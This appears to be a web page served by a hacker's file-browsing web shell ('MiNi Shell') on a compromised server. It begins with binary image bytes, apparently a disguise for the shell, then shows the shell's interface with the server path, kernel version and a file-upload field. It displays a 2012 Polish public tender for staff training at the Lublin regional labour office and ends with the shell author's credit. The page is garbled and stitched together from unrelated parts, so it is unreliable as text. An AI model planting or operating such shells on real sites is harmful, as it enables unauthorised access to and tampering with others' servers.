JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120823/311434-N-2012.html

<p class="kh_header"><b>Lublin: Organizacja i przeprowadzenie szkoleń dla pracowników Wojewódzkiego Urzędu Pracy w Lublinie, w tym w ramach projektu systemowego pt. Profesjonalna kadra - wyższe efekty pracy służb zatrudnienia.</b><br>
<b>Numer ogłoszenia: 311434 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Lublinie , ul. Okopowa 5, 20-022 Lublin, woj. lubelskie, tel. 081 4635300, faks 081 4635305.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.wup.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń dla pracowników Wojewódzkiego Urzędu Pracy w Lublinie, w tym w ramach projektu systemowego pt. Profesjonalna kadra - wyższe efekty pracy służb zatrudnienia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I Organizacja i przeprowadzenie 3-dniowego szkolenia z MS Excel - arkusze kalkulacyjne - kurs podstawowy - wersja MS Office 2007 dla 3 grup po 9 osób tj. łącznie 27 pracowników Wojewódzkiego Urzędu Pracy w Lublinie w miesiącu wrześniu 2012 r.
Część II
Organizacja i przeprowadzenie 2 SZKOLEŃ KOMPUTEROWYCH W PRACY ADMINISTRACYJNEJ pt.:
1) Zaawansowane i nowe funkcje arkusza kalkulacyjnego EXCEL 2010 w pracy administracyjnej
2) Zaawansowane i nowe funkcje PowerPoint 2010 w pracy administracyjnej
dla pracowników Wojewódzkiego Urzędu Pracy w Lublinie organizowanych w ramach projektu systemowego pt. Profesjonalna kadra - wyższe efekty pracy służb zatrudnienia w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie. Liczba osób do przeszkolenia w ramach szkolenia Zaawansowane i nowe funkcje arkusza kalkulacyjnego EXCEL 2010 w pracy administracyjnej - 10 osób. Liczba osób do przeszkolenia w ramach szkolenia  Zaawansowane i nowe funkcje PowerPoint 2010 w pracy administracyjnej
- 9 osób.
Część III
Organizacja i przeprowadzenie szkolenia pt.: Warsztat i metodyka pracy doradcy EURES i doradcy zawodowego w WUP w aktywizacji różnych grup osób bezrobotnych - obsługa osób młodych, kobiet, osób długotrwale bezrobotnych, osób pow. 45 lat, dla pracowników Wojewódzkiego Urzędu Pracy w Lublinie organizowanych w ramach projektu systemowego pt. Profesjonalna kadra - wyższe efekty pracy służb zatrudnienia  w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
 Liczba osób do przeszkolenia - 13 osób..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia ten warunek jeżeli, w okresie ostatnich trzech lat przed wszczęciem postępowania lub w okresie prowadzenia działalności, jeśli okres ten jest krótszy niż trzy lata, należycie (posiada udokumentowane potwierdzenie) zorganizował i przeprowadził co najmniej:
dla części pierwszej i drugiej (łącznie): 10 szkoleń, których przedmiotem były szkolenia komputerowe, w których łącznie brało udział co najmniej 50 osób, 
z czego co najmniej trzy dotyczyły szkolenia MS EXCEL oraz co najmniej trzy dotyczyły szkolenia MS PowerPoint.
dla części trzeciej: 5 szkoleń, z których każde polegało na zorganizowaniu 
i przeprowadzeniu szkolenia dla co najmniej 10 uczestników.
Przez zorganizowanie szkolenia należy rozumieć łącznie następujące działania: przygotowanie programu szkolenia, zapewnienie sali szkoleniowej, zapewnienie cateringu w trakcie szkolenia, zapewnienie materiałów szkoleniowych.
Przez przeprowadzenie szkolenia należy rozumieć: zapewnienie trenera/trenerów i realizację programu szkolenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że dysponuje minimum po jednym trenerze prowadzącym wymienione poniżej szkolenia, który posiada wiedzę i kwalifikacje niezbędne do ich przeprowadzenia.
a)	Wymagania wobec trenera szkolenia opisanego w części pierwszej: MS Excel - arkusze kalkulacyjne - kurs podstawowy - wersja MS Office 2007
- trener posiadający certyfikat ECDL Advanced
- osoba doświadczona  w prowadzeniu szkoleń informatycznych (min. 240 godzin przeprowadzonych szkoleń z programu MS Excel w okresie ostatnich trzech lat przed terminem składania ofert),
- osoba posiadająca kwalifikacje zawodowe, doświadczenie  i wykształcenie wyższe umożliwiające realizację programu szkoleń przedstawionego w przedmiocie zamówienia,
Przez 1 godzinę szkolenia należy rozumieć 45 min.
b)	Wymagania wobec trenera szkolenia opisanego w części  drugiej: Zaawansowane i nowe funkcje arkusza kalkulacyjnego EXCEL 2010 w pracy administracyjnej:
- trener posiadający certyfikat ECDL Advanced,
- osoba doświadczona  w prowadzeniu szkoleń informatycznych (min. 240 godzin przeprowadzonych szkoleń z programu MS Excel w okresie ostatnich trzech lat przed terminem składania ofert), 
- osoba posiadająca kwalifikacje zawodowe, doświadczenie  i wykształcenie wyższe umożliwiające realizację programu szkoleń przedstawionego w przedmiocie zamówienia,
Przez 1 godzinę szkolenia należy rozumieć 45 min.
c)	Wymagania wobec trenera szkolenia opisanego w części  drugiej: Zaawansowane i nowe funkcje PowerPoint 2010 w pracy administracyjnej:
- trener posiadający certyfikat ECDL Advanced,
- osoba doświadczona  w prowadzeniu szkoleń informatycznych (min. 240 godzin przeprowadzonych szkoleń informatycznych, w tym min. 45 godzin z programu PowerPoint w okresie ostatnich trzech lat przed terminem składania ofert), 
- osoba posiadająca kwalifikacje zawodowe, doświadczenie  i wykształcenie wyższe umożliwiające realizację programu szkoleń przedstawionego w przedmiocie zamówienia,
Przez 1 godzinę szkolenia należy rozumieć 45 min.
d)	Wymagania wobec trenera szkolenia opisanego w części  trzeciej: Warsztat i metodyka pracy doradcy EURES i doradcy zawodowego w WUP                            w aktywizacji różnych grup osób bezrobotnych - obsługa osób młodych, kobiet, osób długotrwale bezrobotnych, osób pow. 45 lat, 
Dla zagadnień tematycznych szkolenia:
-Specyfika warsztatu i metodyki pracy doradcy EURES i doradcy zawodowego.
-Podstawy pracy z grupą: skuteczna komunikacja interpersonalna, aktywne słuchanie, klaryfikacje, parafrazy, udzielanie prawidłowej informacji zwrotnej, nauka zachowań - ćwiczenie efektywnej komunikacji, komunikacja trenera, rola komunikatów niewerbalnych.
-Metodyka zajęć grupowych dla dorosłych: przedstawienie struktury prawidłowego warsztatu, cechy dobrego warsztatu, nauka zachowań - ćwiczenie stosowania struktury warsztatu.
-Psychologia grupy: struktura grupy, omówienie ról w grupie, fazy rozwoju grupy, rola trenera w każdej fazie, opór grupy, sytuacje trudne.
-Komunikacja interpersonalna - zwiększenie efektywności porozumiewania się poprzez dopasowanie umiejętności komunikacji do specyfiki poszczególnych grup klientów: osób młodych, kobiet, osób długotrwale bezrobotnych, osób powyżej  45 lat. 
trener przeprowadził w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 szkolenie/warsztat dla pracowników Publicznych Służb Zatrudnienia z zakresu usług i instrumentów rynku pracy zawartych w ustawie o promocji zatrudnienia i instrumentach rynku pracy i/lub profesjonalnej obsługi klienta adresowane do pracowników Publicznych Służb Zatrudnienia. Posiada wykształcenie wyższe magisterskie oraz znajomość zadań realizowanych przez doradców zawodowych i doradców EURES w wojewódzkim urzędzie pracy w oparciu o  ustawę o promocji zatrudnienia i instrumentach rynku pracy (Wykazane szkolenie/warsztat nie może dotyczyć szkolenia/warsztatu prowadzonego drogą elektroniczną, metodą e-learningu).
Dla zagadnień tematycznych szkolenia:
Emisja głosu z elementami techniki i estetyki mowy, w tym: wstęp do emisji - ćwiczenia ruchowe, ćwiczenia oddechowe - świadome doświadczenie oddechu, przygotowanie do lekkiego, dźwięcznego, nośnego i długiego mówienia, ćwiczenie fonacyjne, ćwiczenia z technik mowy;
trener posiada wykształcenie wyższe magisterskie oraz kwalifikacje zawodowe z zakresu logopedii  oraz emisji i higieny głosu.
Zamawiający dopuszcza możliwość realizacji szkolenia przez 1 trenera spełniającego wszystkie w/w wymagania.
Przez 1 godzinę szkolenia należy rozumieć 45 min.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ 
na realizacje przedmiotu umowy.
2.	Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy.
3.	Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy.
4.	Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
5.    Nastąpią zmiany teleadresowe strony.
6.    Zmiany terminów szkoleń składających się na przedmiot umowy, jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenie szkolenia (w szczególności choroba trenera, choroba uczestników, pilne obowiązki zawodowe uczestników powodujące ich bezwzględną obecność w pracy, siła wyższa).
7.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.lublin.pl/wup/index.php?kat=200<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Lublinie, ul. Okopowa 5 pok. nr 310, 20-022 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 09:00, miejsce: Wojewódzki Urząd Pracy w Lublinie, ul. Okopowa 5 pok. nr 326A (III p.), 20-022 Lublin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest częściowo współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki.
Wymagany termin wykonania zamówienia:
Część I do 28 września 2012 r.
Część II 
1) Zaawansowane i nowe funkcje arkusza kalkulacyjnego EXCEL 2010 w pracy administracyjnej do 28 września 2012 r.
2) Zaawansowane i nowe funkcje PowerPoint 2010 w pracy administracyjnej
do 31 października 2012 r.
Część III do 31 stycznia 2013 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie 3-dniowego szkolenia z MS Excel - arkusze kalkulacyjne - kurs podstawowy - wersja MS Office 2007 dla 3 grup po 9 osób tj. łącznie 27 pracowników Wojewódzkiego Urzędu Pracy w Lublinie w miesiącu wrześniu 2012 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie 3-dniowego szkolenia z MS Excel - arkusze kalkulacyjne - kurs podstawowy - wersja MS Office 2007 dla 3 grup po 9 osób tj. łącznie 27 pracowników Wojewódzkiego Urzędu Pracy w Lublinie w miesiącu wrześniu 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie 2 SZKOLEŃ KOMPUTEROWYCH W PRACY ADMINISTRACYJNEJ pt.:
1) Zaawansowane i nowe funkcje arkusza kalkulacyjnego EXCEL 2010 w pracy administracyjnej
2) Zaawansowane i nowe funkcje PowerPoint 2010 w pracy administracyjnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie 2 SZKOLEŃ KOMPUTEROWYCH W PRACY ADMINISTRACYJNEJ pt.:
1) Zaawansowane i nowe funkcje arkusza kalkulacyjnego EXCEL 2010 w pracy administracyjnej
2) Zaawansowane i nowe funkcje PowerPoint 2010 w pracy administracyjnej
dla pracowników Wojewódzkiego Urzędu Pracy w Lublinie organizowanych w ramach projektu systemowego pt. Profesjonalna kadra - wyższe efekty pracy służb zatrudnienia w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
W ramach szkolenia  Zaawansowane i nowe funkcje arkusza kalkulacyjnego EXCEL 2010 w pracy administracyjnej liczba osób do przeszkolenia - 10. W ramach szkolenia Zaawansowane i nowe funkcje PowerPoint 2010 w pracy administracyjnej liczba osób do przeszkolenia - 9..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia pt.: Warsztat i metodyka pracy doradcy EURES i doradcy zawodowego w WUP w aktywizacji różnych grup osób bezrobotnych - obsługa osób młodych, kobiet, osób długotrwale bezrobotnych, osób pow. 45 lat, dla pracowników Wojewódzkiego Urzędu Pracy w Lublinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie szkolenia pt.: Warsztat i metodyka pracy doradcy EURES i doradcy zawodowego w WUP w aktywizacji różnych grup osób bezrobotnych - obsługa osób młodych, kobiet, osób długotrwale bezrobotnych, osób pow. 45 lat, dla pracowników Wojewódzkiego Urzędu Pracy w Lublinie organizowanych w ramach projektu systemowego pt. Profesjonalna kadra - wyższe efekty pracy służb zatrudnienia   w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie. Liczba osób do przeszkolenia - 13 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com